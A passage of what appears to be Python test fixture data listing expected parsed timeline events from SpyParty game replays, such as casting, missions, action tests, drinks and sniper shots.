(None,),
TimelineCategory.MissionComplete,
Missions.Purloin,
ActionTest.NoAT,
),
(
"sniper",
"02:30.1",
"marked suspicious.",
(Characters.Teal,),
(2 * 60 + 30.1),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:26.7",
"marked spy suspicious.",
(Characters.Morgan,),
(2 * 60 + 26.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:24.1",
"marked less suspicious.",
(Characters.Wheels,),
(2 * 60 + 24.1),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:15.2",
"flirtation cooldown expired.",
(None,),
(2 * 60 + 15.2),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:13.5",
"action triggered: seduce target",
(None,),
(2 * 60 + 13.5),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:13.5",
"begin flirtation with seduction target.",
(Characters.Teal,),
(2 * 60 + 13.5),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"02:13.4",
"marked less suspicious.",
(Characters.General,),
(2 * 60 + 13.4),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:13.0",
"marked less suspicious.",
(Characters.Boots,),
(2 * 60 + 13.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:12.8",
"action test white: seduce target",
(None,),
(2 * 60 + 12.8),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.White,
),
(
"spy",
"02:12.8",
"flirt with seduction target: 68%",
(Characters.Teal,),
(2 * 60 + 12.8),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"02:12.3",
"marked less suspicious.",
(Characters.Smallman,),
(2 * 60 + 12.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"02:08.3",
"marked suspicious.",
(Characters.Disney,),
(2 * 60 + 08.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:52.6",
"marked book.",
(Characters.Salmon,),
(1 * 60 + 52.6),
None,
(Roles.Civilian,),
(Books.Green,),
TimelineCategory.SniperLights | TimelineCategory.Books,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:41.7",
"waiter offered drink.",
(Characters.Morgan,),
(1 * 60 + 41.7),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:38.1",
"got drink from waiter.",
(Characters.Morgan,),
(1 * 60 + 38.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:38.1",
"waiter stopped offering drink.",
(Characters.Morgan,),
(1 * 60 + 38.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:33.0",
"marked suspicious.",
(Characters.Bling,),
(1 * 60 + 33.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:31.9",
"sipped drink.",
(Characters.Morgan,),
(1 * 60 + 31.9),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:27.8",
"flirtation cooldown expired.",
(None,),
(1 * 60 + 27.8),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:26.8",
"action triggered: seduce target",
(None,),
(1 * 60 + 26.8),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:26.8",
"begin flirtation with seduction target.",
(Characters.Teal,),
(1 * 60 + 26.8),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:25.4",
"action test ignored: seduce target",
(None,),
(1 * 60 + 25.4),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Ignored,
),
(
"spy",
"01:25.4",
"flirt with seduction target: 100%",
(Characters.Teal,),
(1 * 60 + 25.4),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:25.4",
"target seduced.",
(Characters.Teal,),
(1 * 60 + 25.4),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionComplete,
Missions.Seduce,
ActionTest.NoAT,
),
(
"sniper",
"01:08.3",
"marked neutral suspicion.",
(Characters.Bling,),
(1 * 60 + 08.3),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:08.1",
"sipped drink.",
(Characters.Morgan,),
(1 * 60 + 08.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:49.1",
"took last sip of drink.",
(Characters.Morgan,),
(00 * 60 + 49.1),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"00:45.4",
"took shot.",
(Characters.Disney,),
(00 * 60 + 45.4),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperShot,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"00:41.6",
"sniper shot civilian.",
(Characters.Disney,),
(00 * 60 + 41.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"-4198543829091342944",
[
(
"spy",
"01:03.6",
"spy joined conversation with double agent.",
(Characters.Boots,),
(1 * 60 + 03.6),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:59.0",
"action triggered: contact double agent",
(None,),
(00 * 60 + 59.0),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:59.0",
"real banana bread started.",
(None,),
(00 * 60 + 59.0),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:58.0",
"action test white: contact double agent",
(None,),
(00 * 60 + 58.0),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Contact,
ActionTest.White,
),
(
"sniper",
"00:54.6",
"marked less suspicious.",
(Characters.Wheels,),
(00 * 60 + 54.6),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"00:53.2",
"marked neutral suspicion.",
(Characters.Wheels,),
(00 * 60 + 53.2),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:51.6",
"banana bread uttered.",
(None,),
(00 * 60 + 51.6),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"00:51.0",
"double agent contacted.",
(Characters.Boots,),
(00 * 60 + 51.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.MissionComplete,
Missions.Contact,
ActionTest.NoAT,
),
(
"sniper",
"00:49.8",
"marked less suspicious.",
(Characters.Wheels,),
(00 * 60 + 49.8),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"00:48.6",
"marked less suspicious.",
(Characters.Salmon,),
(00 * 60 + 48.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:42.5",
"spy leaves conversation.",
(None,),
(00 * 60 + 42.5),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:42.5",
"spy left conversation with double agent.",
(Characters.Boots,),
(00 * 60 + 42.5),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:36.5",
"action triggered: seduce target",
(None,),
(00 * 60 + 36.5),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:36.5",
"begin flirtation with seduction target.",
(Characters.Wheels,),
(00 * 60 + 36.5),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:35.3",
"action test green: seduce target",
(None,),
(00 * 60 + 35.3),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"00:34.0",
"flirt with seduction target: 85%",
(Characters.Wheels,),
(00 * 60 + 34.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:25.3",
"put book in bookcase.",
(None,),
(00 * 60 + 25.3),
None,
(None,),
(Books.Blue, Books.Blue),
TimelineCategory.Books,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"00:15.6",
"marked less suspicious.",
(Characters.Morgan,),
(00 * 60 + 15.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:15.5",
"flirtation cooldown expired.",
(None,),
(00 * 60 + 15.5),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:09.8",
"spy enters conversation.",
(None,),
(00 * 60 + 09.8),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:08.5",
"action triggered: seduce target",
(None,),
(00 * 60 + 08.5),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:08.5",
"begin flirtation with seduction target.",
(Characters.Wheels,),
(00 * 60 + 08.5),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:07.2",
"action test green: seduce target",
(None,),
(00 * 60 + 07.2),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Seduce,
ActionTest.Green,
),
(
"spy",
"00:07.2",
"flirt with seduction target: 100%",
(Characters.Wheels,),
(00 * 60 + 07.2),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionPartial,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"00:07.2",
"target seduced.",
(Characters.Wheels,),
(00 * 60 + 07.2),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.MissionComplete,
Missions.Seduce,
ActionTest.NoAT,
),
(
"game",
"00:07.2",
"missions completed. 10 second countdown.",
(None,),
(00 * 60 + 07.2),
None,
(None,),
(None,),
TimelineCategory.MissionCountdown,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"-00:00.0",
"took shot.",
(Characters.Rocker,),
(00 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperShot,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"-00:00.2",
"overtime!",
(None,),
-(00 * 60 + 00.2),
None,
(None,),
(None,),
TimelineCategory.Overtime,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"-00:00.6",
"spy leaves conversation.",
(None,),
-(00 * 60 + 00.6),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"-00:03.6",
"sniper shot civilian.",
(Characters.Rocker,),
-(00 * 60 + 03.6),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"bad_time",
[
(
"spy",
"01:54.1",
"sipped drink.",
(Characters.Salmon,),
114.1,
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:46.8",
"spy leaves conversation.",
(None,),
106.8,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:42.4",
"flirtation cooldown expired.",
(None,),
102.4,
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"01:34.1",
"delegated purloin timer expired.",
(None,),
94.1,
None,
(None,),
(None,),
TimelineCategory.Drinks,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"01:33.6",
"took last sip of drink.",
(Characters.Salmon,),
93.6,
None,
(Roles.Spy,),
(None,),
TimelineCategory.Drinks,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:30.8",
"picked up statue.",
(None,),
90.8,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:28.1",
"picked up fingerprintable statue.",
(None,),
88.1,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"01:27.3",
"action triggered: inspect statues",
(None,),
87.3,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTriggered,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:26.0",
"action test white: inspect statues",
(None,),
86.0,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.ActionTest,
Missions.Inspect,
ActionTest.White,
),
(
"spy",
"01:22.3",
"held statue inspected.",
(None,),
82.3,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:22.3",
"all statues inspected.",
(None,),
82.3,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionComplete,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"01:21.6",
"action triggered: fingerprint ambassador",
(None,),
81.6,
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"01:21.6",
"started fingerprinting statue.",
(None,),
81.6,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"01:20.6",
"fingerprinted statue.",
(None,),
80.6,
None,
(None,),
(None,),
TimelineCategory.Statues | TimelineCategory.MissionPartial,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"01:20.4",
"put back statue.",
(None,),
80.4,
None,
(None,),
(None,),
TimelineCategory.Statues,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:11.1",
"marked suspicious.",
(Characters.Sari,),
71.1,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:07.7",
"spy enters conversation.",
(None,),
67.7,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:59.3",
"spy leaves conversation.",
(None,),
59.3,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:56.8",
"spy enters conversation.",
(None,),
56.8,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:43.0",
"spy leaves conversation.",
(None,),
43.0,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"00:41.1",
"marked suspicious.",
(Characters.Alice,),
41.1,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:35.6",
"action triggered: check watch",
(None,),
35.6,
None,
(None,),
(None,),
TimelineCategory.Watch | TimelineCategory.ActionTriggered,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:35.6",
"watch checked to add time.",
(None,),
35.6,
None,
(None,),
(None,),
TimelineCategory.Watch | TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"00:34.5",
"action test green: check watch",
(None,),
34.5,
None,
(None,),
(None,),
TimelineCategory.Watch
| TimelineCategory.TimeAdd
| TimelineCategory.ActionTest,
Missions.NoMission,
ActionTest.Green,
),
(
"spy",
"00:33.1",
"45 seconds added to match.",
(None,),
33.1,
None,
(None,),
(None,),
TimelineCategory.TimeAdd,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:17.6",
"marked suspicious.",
(Characters.Wheels,),
77.6,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:12.1",
"spy enters conversation.",
(None,),
72.1,
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:12.1",
"spy joined conversation with double agent.",
(Characters.Duke,),
72.1,
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"00:58.0",
"took shot.",
(Characters.Sari,),
58.0,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.SniperShot,
Missions.NoMission,
ActionTest.NoAT,
),
(
"game",
"00:54.3",
"sniper shot civilian.",
(Characters.Sari,),
54.3,
None,
(Roles.Civilian,),
(None,),
TimelineCategory.GameEnd,
Missions.NoMission,
ActionTest.NoAT,
),
],
),
(
"duke_spy",
[
(
"spy",
"04:30.0",
"spy cast.",
(Characters.Duke,),
(4 * 60 + 30.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"ambassador cast.",
(Characters.Rocker,),
(4 * 60 + 30.0),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"double agent cast.",
(Characters.Oprah,),
(4 * 60 + 30.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"suspected double agent cast.",
(Characters.General,),
(4 * 60 + 30.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"suspected double agent cast.",
(Characters.Disney,),
(4 * 60 + 30.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"seduction target cast.",
(Characters.Plain,),
(4 * 60 + 30.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Helen,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Queen,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Alice,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Sari,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Bling,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Carlos,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Teal,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Wheels,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Salmon,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Boots,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Sikh,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Morgan,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Irish,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Smallman,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"civilian cast.",
(Characters.Taft,),
(4 * 60 + 30.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"bug ambassador selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"contact double agent selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"transfer microfilm selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Transfer,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"swap statue selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Swap,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"inspect 3 statues selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Inspect,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"seduce target selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"purloin guest list selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Purloin,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"fingerprint ambassador selected.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Fingerprint,
ActionTest.NoAT,
),
(
"spy",
"04:30.0",
"bug ambassador enabled.",
(None,),
(4 * 60 + 30.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Bug,
ActionTest.NoAT,
),
],
),
(
"short_game",
[
(
"spy",
"02:00.0",
"spy cast.",
(Characters.Smallman,),
(2 * 60 + 00.0),
None,
(Roles.Spy,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"ambassador cast.",
(Characters.Taft,),
(2 * 60 + 00.0),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"double agent cast.",
(Characters.Irish,),
(2 * 60 + 00.0),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"seduction target cast.",
(Characters.Morgan,),
(2 * 60 + 00.0),
None,
(Roles.SeductionTarget,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"civilian cast.",
(Characters.Plain,),
(2 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"civilian cast.",
(Characters.Sikh,),
(2 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"civilian cast.",
(Characters.Bling,),
(2 * 60 + 00.0),
None,
(Roles.Civilian,),
(None,),
TimelineCategory.Cast,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"bug ambassador selected.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"contact double agent selected.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"seduce target selected.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionSelected,
Missions.Seduce,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"bug ambassador enabled.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Bug,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"contact double agent enabled.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"02:00.0",
"seduce target enabled.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.MissionEnabled,
Missions.Seduce,
ActionTest.NoAT,
),
(
"game",
"02:00.0",
"game started.",
(None,),
(2 * 60 + 00.0),
None,
(None,),
(None,),
TimelineCategory.GameStart,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:58.8",
"spy player takes control from ai.",
(None,),
(1 * 60 + 58.8),
None,
(None,),
(None,),
TimelineCategory.NoCategory,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:58.7",
"marked suspicious.",
(Characters.Taft,),
(1 * 60 + 58.7),
None,
(Roles.Ambassador,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:58.7",
"spy leaves conversation.",
(None,),
(1 * 60 + 58.7),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"sniper",
"01:56.3",
"marked spy suspicious.",
(Characters.Smallman,),
(1 * 60 + 56.3),
None,
(Roles.Spy,),
(None,),
TimelineCategory.SniperLights,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:56.1",
"spy enters conversation.",
(None,),
(1 * 60 + 56.1),
None,
(None,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:56.1",
"spy joined conversation with double agent.",
(Characters.Irish,),
(1 * 60 + 56.1),
None,
(Roles.DoubleAgent,),
(None,),
TimelineCategory.Conversation,
Missions.NoMission,
ActionTest.NoAT,
),
(
"spy",
"01:49.7",
"action triggered: contact double agent",
(None,),
(1 * 60 + 49.7),
None,
(None,),
(None,),
TimelineCategory.ActionTriggered,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"01:49.7",
"real banana bread started.",
(None,),
(1 * 60 + 49.7),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"01:48.8",
"action test green: contact double agent",
(None,),
(1 * 60 + 48.8),
None,
(None,),
(None,),
TimelineCategory.ActionTest,
Missions.Contact,
ActionTest.Green,
),
(
"spy",
"01:48.8",
"banana bread uttered.",
(None,),
(1 * 60 + 48.8),
None,
(None,),
(None,),
TimelineCategory.BananaBread,
Missions.Contact,
ActionTest.NoAT,
),
(
"spy",
"01:48.3",
"double agent contacted.",
(Characters.Irish,),
(1 * 60 + 48.3),
None,
